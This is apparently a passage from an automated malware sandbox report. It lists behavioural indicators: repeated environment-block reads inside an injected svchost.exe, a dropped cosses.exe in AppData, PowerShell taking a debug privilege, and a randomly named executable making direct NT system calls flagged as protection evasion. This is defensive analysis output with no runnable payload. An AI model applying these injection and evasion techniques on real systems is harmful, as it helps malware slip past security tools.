                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036470C0 mov ecx, dword ptr fs:[00000030h]7_2_036470C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036470C0 mov ecx, dword ptr fs:[00000030h]7_2_036470C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036470C0 mov eax, dword ptr fs:[00000030h]7_2_036470C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036470C0 mov eax, dword ptr fs:[00000030h]7_2_036470C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036470C0 mov eax, dword ptr fs:[00000030h]7_2_036470C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036470C0 mov eax, dword ptr fs:[00000030h]7_2_036470C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036470C0 mov eax, dword ptr fs:[00000030h]7_2_036470C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036470C0 mov eax, dword ptr fs:[00000030h]7_2_036470C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036470C0 mov eax, dword ptr fs:[00000030h]7_2_036470C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036470C0 mov eax, dword ptr fs:[00000030h]7_2_036470C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036470C0 mov eax, dword ptr fs:[00000030h]7_2_036470C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036470C0 mov eax, dword ptr fs:[00000030h]7_2_036470C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036470C0 mov eax, dword ptr fs:[00000030h]7_2_036470C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036470C0 mov eax, dword ptr fs:[00000030h]7_2_036470C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_037050D9 mov eax, dword ptr fs:[00000030h]7_2_037050D9
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036AD0C0 mov eax, dword ptr fs:[00000030h]7_2_036AD0C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036AD0C0 mov eax, dword ptr fs:[00000030h]7_2_036AD0C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B20DE mov eax, dword ptr fs:[00000030h]7_2_036B20DE
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036590DB mov eax, dword ptr fs:[00000030h]7_2_036590DB
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036F60B8 mov eax, dword ptr fs:[00000030h]7_2_036F60B8
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036F60B8 mov ecx, dword ptr fs:[00000030h]7_2_036F60B8
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0363208A mov eax, dword ptr fs:[00000030h]7_2_0363208A
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362D08D mov eax, dword ptr fs:[00000030h]7_2_0362D08D
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03635096 mov eax, dword ptr fs:[00000030h]7_2_03635096
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0365D090 mov eax, dword ptr fs:[00000030h]7_2_0365D090
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0365D090 mov eax, dword ptr fs:[00000030h]7_2_0365D090
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366909C mov eax, dword ptr fs:[00000030h]7_2_0366909C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362B765 mov eax, dword ptr fs:[00000030h]7_2_0362B765
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362B765 mov eax, dword ptr fs:[00000030h]7_2_0362B765
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362B765 mov eax, dword ptr fs:[00000030h]7_2_0362B765
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362B765 mov eax, dword ptr fs:[00000030h]7_2_0362B765
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03638770 mov eax, dword ptr fs:[00000030h]7_2_03638770
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03640770 mov eax, dword ptr fs:[00000030h]7_2_03640770
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03640770 mov eax, dword ptr fs:[00000030h]7_2_03640770
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03640770 mov eax, dword ptr fs:[00000030h]7_2_03640770
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03640770 mov eax, dword ptr fs:[00000030h]7_2_03640770
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03640770 mov eax, dword ptr fs:[00000030h]7_2_03640770
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03640770 mov eax, dword ptr fs:[00000030h]7_2_03640770
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03640770 mov eax, dword ptr fs:[00000030h]7_2_03640770
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03640770 mov eax, dword ptr fs:[00000030h]7_2_03640770
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03640770 mov eax, dword ptr fs:[00000030h]7_2_03640770
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03640770 mov eax, dword ptr fs:[00000030h]7_2_03640770
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03640770 mov eax, dword ptr fs:[00000030h]7_2_03640770
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03640770 mov eax, dword ptr fs:[00000030h]7_2_03640770
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03643740 mov eax, dword ptr fs:[00000030h]7_2_03643740
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03643740 mov eax, dword ptr fs:[00000030h]7_2_03643740
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03643740 mov eax, dword ptr fs:[00000030h]7_2_03643740
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366674D mov esi, dword ptr fs:[00000030h]7_2_0366674D
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366674D mov eax, dword ptr fs:[00000030h]7_2_0366674D
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366674D mov eax, dword ptr fs:[00000030h]7_2_0366674D
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03630750 mov eax, dword ptr fs:[00000030h]7_2_03630750
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03672750 mov eax, dword ptr fs:[00000030h]7_2_03672750
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03672750 mov eax, dword ptr fs:[00000030h]7_2_03672750
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03703749 mov eax, dword ptr fs:[00000030h]7_2_03703749
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B4755 mov eax, dword ptr fs:[00000030h]7_2_036B4755
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036EF72E mov eax, dword ptr fs:[00000030h]7_2_036EF72E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03633720 mov eax, dword ptr fs:[00000030h]7_2_03633720
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0364F720 mov eax, dword ptr fs:[00000030h]7_2_0364F720
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0364F720 mov eax, dword ptr fs:[00000030h]7_2_0364F720
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0364F720 mov eax, dword ptr fs:[00000030h]7_2_0364F720
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036F972B mov eax, dword ptr fs:[00000030h]7_2_036F972B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366C720 mov eax, dword ptr fs:[00000030h]7_2_0366C720
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366C720 mov eax, dword ptr fs:[00000030h]7_2_0366C720
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0370B73C mov eax, dword ptr fs:[00000030h]7_2_0370B73C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0370B73C mov eax, dword ptr fs:[00000030h]7_2_0370B73C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0370B73C mov eax, dword ptr fs:[00000030h]7_2_0370B73C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0370B73C mov eax, dword ptr fs:[00000030h]7_2_0370B73C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03629730 mov eax, dword ptr fs:[00000030h]7_2_03629730
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03629730 mov eax, dword ptr fs:[00000030h]7_2_03629730
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03665734 mov eax, dword ptr fs:[00000030h]7_2_03665734
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0363973A mov eax, dword ptr fs:[00000030h]7_2_0363973A
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0363973A mov eax, dword ptr fs:[00000030h]7_2_0363973A
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366273C mov eax, dword ptr fs:[00000030h]7_2_0366273C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366273C mov ecx, dword ptr fs:[00000030h]7_2_0366273C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366273C mov eax, dword ptr fs:[00000030h]7_2_0366273C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036AC730 mov eax, dword ptr fs:[00000030h]7_2_036AC730
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03637703 mov eax, dword ptr fs:[00000030h]7_2_03637703
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03635702 mov eax, dword ptr fs:[00000030h]7_2_03635702
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03635702 mov eax, dword ptr fs:[00000030h]7_2_03635702
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366C700 mov eax, dword ptr fs:[00000030h]7_2_0366C700
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03630710 mov eax, dword ptr fs:[00000030h]7_2_03630710
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03660710 mov eax, dword ptr fs:[00000030h]7_2_03660710
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366F71F mov eax, dword ptr fs:[00000030h]7_2_0366F71F
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366F71F mov eax, dword ptr fs:[00000030h]7_2_0366F71F
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0363D7E0 mov ecx, dword ptr fs:[00000030h]7_2_0363D7E0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036527ED mov eax, dword ptr fs:[00000030h]7_2_036527ED
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036527ED mov eax, dword ptr fs:[00000030h]7_2_036527ED
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036527ED mov eax, dword ptr fs:[00000030h]7_2_036527ED
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036347FB mov eax, dword ptr fs:[00000030h]7_2_036347FB
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036347FB mov eax, dword ptr fs:[00000030h]7_2_036347FB
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0363C7C0 mov eax, dword ptr fs:[00000030h]7_2_0363C7C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036357C0 mov eax, dword ptr fs:[00000030h]7_2_036357C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036357C0 mov eax, dword ptr fs:[00000030h]7_2_036357C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036357C0 mov eax, dword ptr fs:[00000030h]7_2_036357C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B97A9 mov eax, dword ptr fs:[00000030h]7_2_036B97A9
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036BF7AF mov eax, dword ptr fs:[00000030h]7_2_036BF7AF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036BF7AF mov eax, dword ptr fs:[00000030h]7_2_036BF7AF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036BF7AF mov eax, dword ptr fs:[00000030h]7_2_036BF7AF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036BF7AF mov eax, dword ptr fs:[00000030h]7_2_036BF7AF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036BF7AF mov eax, dword ptr fs:[00000030h]7_2_036BF7AF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_037037B6 mov eax, dword ptr fs:[00000030h]7_2_037037B6
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036307AF mov eax, dword ptr fs:[00000030h]7_2_036307AF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0365D7B0 mov eax, dword ptr fs:[00000030h]7_2_0365D7B0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362F7BA mov eax, dword ptr fs:[00000030h]7_2_0362F7BA
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362F7BA mov eax, dword ptr fs:[00000030h]7_2_0362F7BA
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362F7BA mov eax, dword ptr fs:[00000030h]7_2_0362F7BA
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362F7BA mov eax, dword ptr fs:[00000030h]7_2_0362F7BA
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362F7BA mov eax, dword ptr fs:[00000030h]7_2_0362F7BA
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362F7BA mov eax, dword ptr fs:[00000030h]7_2_0362F7BA
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362F7BA mov eax, dword ptr fs:[00000030h]7_2_0362F7BA
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362F7BA mov eax, dword ptr fs:[00000030h]7_2_0362F7BA
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362F7BA mov eax, dword ptr fs:[00000030h]7_2_0362F7BA
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036EF78A mov eax, dword ptr fs:[00000030h]7_2_036EF78A
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036F866E mov eax, dword ptr fs:[00000030h]7_2_036F866E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036F866E mov eax, dword ptr fs:[00000030h]7_2_036F866E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366A660 mov eax, dword ptr fs:[00000030h]7_2_0366A660
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366A660 mov eax, dword ptr fs:[00000030h]7_2_0366A660
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03669660 mov eax, dword ptr fs:[00000030h]7_2_03669660
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03669660 mov eax, dword ptr fs:[00000030h]7_2_03669660
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03662674 mov eax, dword ptr fs:[00000030h]7_2_03662674
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0364C640 mov eax, dword ptr fs:[00000030h]7_2_0364C640
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0364E627 mov eax, dword ptr fs:[00000030h]7_2_0364E627
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362F626 mov eax, dword ptr fs:[00000030h]7_2_0362F626
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362F626 mov eax, dword ptr fs:[00000030h]7_2_0362F626
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362F626 mov eax, dword ptr fs:[00000030h]7_2_0362F626
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362F626 mov eax, dword ptr fs:[00000030h]7_2_0362F626
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362F626 mov eax, dword ptr fs:[00000030h]7_2_0362F626
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362F626 mov eax, dword ptr fs:[00000030h]7_2_0362F626
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362F626 mov eax, dword ptr fs:[00000030h]7_2_0362F626
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362F626 mov eax, dword ptr fs:[00000030h]7_2_0362F626
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362F626 mov eax, dword ptr fs:[00000030h]7_2_0362F626
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03666620 mov eax, dword ptr fs:[00000030h]7_2_03666620
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03705636 mov eax, dword ptr fs:[00000030h]7_2_03705636
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03668620 mov eax, dword ptr fs:[00000030h]7_2_03668620
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0363262C mov eax, dword ptr fs:[00000030h]7_2_0363262C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03661607 mov eax, dword ptr fs:[00000030h]7_2_03661607
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036AE609 mov eax, dword ptr fs:[00000030h]7_2_036AE609
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366F603 mov eax, dword ptr fs:[00000030h]7_2_0366F603
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0364260B mov eax, dword ptr fs:[00000030h]7_2_0364260B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0364260B mov eax, dword ptr fs:[00000030h]7_2_0364260B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0364260B mov eax, dword ptr fs:[00000030h]7_2_0364260B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0364260B mov eax, dword ptr fs:[00000030h]7_2_0364260B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0364260B mov eax, dword ptr fs:[00000030h]7_2_0364260B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0364260B mov eax, dword ptr fs:[00000030h]7_2_0364260B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0364260B mov eax, dword ptr fs:[00000030h]7_2_0364260B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03633616 mov eax, dword ptr fs:[00000030h]7_2_03633616
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03633616 mov eax, dword ptr fs:[00000030h]7_2_03633616
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03672619 mov eax, dword ptr fs:[00000030h]7_2_03672619
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036C36EE mov eax, dword ptr fs:[00000030h]7_2_036C36EE
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036C36EE mov eax, dword ptr fs:[00000030h]7_2_036C36EE
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036C36EE mov eax, dword ptr fs:[00000030h]7_2_036C36EE
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036C36EE mov eax, dword ptr fs:[00000030h]7_2_036C36EE
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036C36EE mov eax, dword ptr fs:[00000030h]7_2_036C36EE
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036C36EE mov eax, dword ptr fs:[00000030h]7_2_036C36EE
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0365D6E0 mov eax, dword ptr fs:[00000030h]7_2_0365D6E0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0365D6E0 mov eax, dword ptr fs:[00000030h]7_2_0365D6E0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036636EF mov eax, dword ptr fs:[00000030h]7_2_036636EF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036AE6F2 mov eax, dword ptr fs:[00000030h]7_2_036AE6F2
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036AE6F2 mov eax, dword ptr fs:[00000030h]7_2_036AE6F2
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036AE6F2 mov eax, dword ptr fs:[00000030h]7_2_036AE6F2
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036AE6F2 mov eax, dword ptr fs:[00000030h]7_2_036AE6F2
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B06F1 mov eax, dword ptr fs:[00000030h]7_2_036B06F1
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B06F1 mov eax, dword ptr fs:[00000030h]7_2_036B06F1
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036ED6F0 mov eax, dword ptr fs:[00000030h]7_2_036ED6F0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366A6C7 mov ebx, dword ptr fs:[00000030h]7_2_0366A6C7
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366A6C7 mov eax, dword ptr fs:[00000030h]7_2_0366A6C7
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0363B6C0 mov eax, dword ptr fs:[00000030h]7_2_0363B6C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0363B6C0 mov eax, dword ptr fs:[00000030h]7_2_0363B6C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0363B6C0 mov eax, dword ptr fs:[00000030h]7_2_0363B6C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0363B6C0 mov eax, dword ptr fs:[00000030h]7_2_0363B6C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0363B6C0 mov eax, dword ptr fs:[00000030h]7_2_0363B6C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0363B6C0 mov eax, dword ptr fs:[00000030h]7_2_0363B6C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036F16CC mov eax, dword ptr fs:[00000030h]7_2_036F16CC
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036F16CC mov eax, dword ptr fs:[00000030h]7_2_036F16CC
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036F16CC mov eax, dword ptr fs:[00000030h]7_2_036F16CC
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036F16CC mov eax, dword ptr fs:[00000030h]7_2_036F16CC
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036EF6C7 mov eax, dword ptr fs:[00000030h]7_2_036EF6C7
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036616CF mov eax, dword ptr fs:[00000030h]7_2_036616CF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366C6A6 mov eax, dword ptr fs:[00000030h]7_2_0366C6A6
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362D6AA mov eax, dword ptr fs:[00000030h]7_2_0362D6AA
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362D6AA mov eax, dword ptr fs:[00000030h]7_2_0362D6AA
                  Source: C:\Windows\SysWOW64\svchost.exe | Code function: 7_2_036276B2 mov eax, dword ptr fs:[00000030h] 7_2_036276B2
                  Source: C:\Users\user\AppData\Roaming\cosses.exe | Code function: 6_2_001680A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation, 6_2_001680A9
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                  Source: C:\Users\user\AppData\Roaming\cosses.exe | Code function: 6_2_0013A124 SetUnhandledExceptionFilter, 6_2_0013A124
                  Source: C:\Users\user\AppData\Roaming\cosses.exe | Code function: 6_2_0013A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_0013A155

                  HIPS / PFW / Operating System Protection Evasion

                  Source: Yara match | File source: amsi32_8812.amsi.csv, type: OTHER
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exe | NtQuerySystemInformation: Direct from: 0x772748CC
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exe | NtQueryVolumeInformationFile: Direct from: 0x77272F2C
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exe | NtOpenSection: Direct from: 0x77272E0C
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exe | NtClose: Direct from: 0x77272B6C
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exe | NtReadVirtualMemory: Direct from: 0x77272E8C
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exe | NtCreateKey: Direct from: 0x77272C6C
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exe | NtSetInformationThread: Direct from: 0x77272B4C
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exe | NtQueryAttributesFile: Direct from: 0x77272E6C
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exe | NtAllocateVirtualMemory: Direct from: 0x772748EC
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exe | NtQueryInformationToken: Direct from: 0x77272CAC
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exe | NtTerminateThread: Direct from: 0x77272FCC
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exe | NtOpenKeyEx: Direct from: 0x77272B9C
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exe | NtDeviceIoControlFile: Direct from: 0x77272AEC
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exe | NtAllocateVirtualMemory: Direct from: 0x77272BEC
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exe | NtProtectVirtualMemory: Direct from: 0x77267B2E
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exe | NtCreateFile: Direct from: 0x77272FEC
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exe | NtOpenFile: Direct from: 0x77272DCC
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exe | NtWriteVirtualMemory: Direct from: 0x77272E3C
                  Source: C:\Program Files (x86)\WBXxzTiOZQlFvWcHBBLiFQzXrcMxczHCamSrouxYgxWCnoeJCmGsAQwPDXivEJh\hudFv7yP8kEYIbmJoqYH.exe | NtMapViewOfSection: Direct from: 0x77272D1C
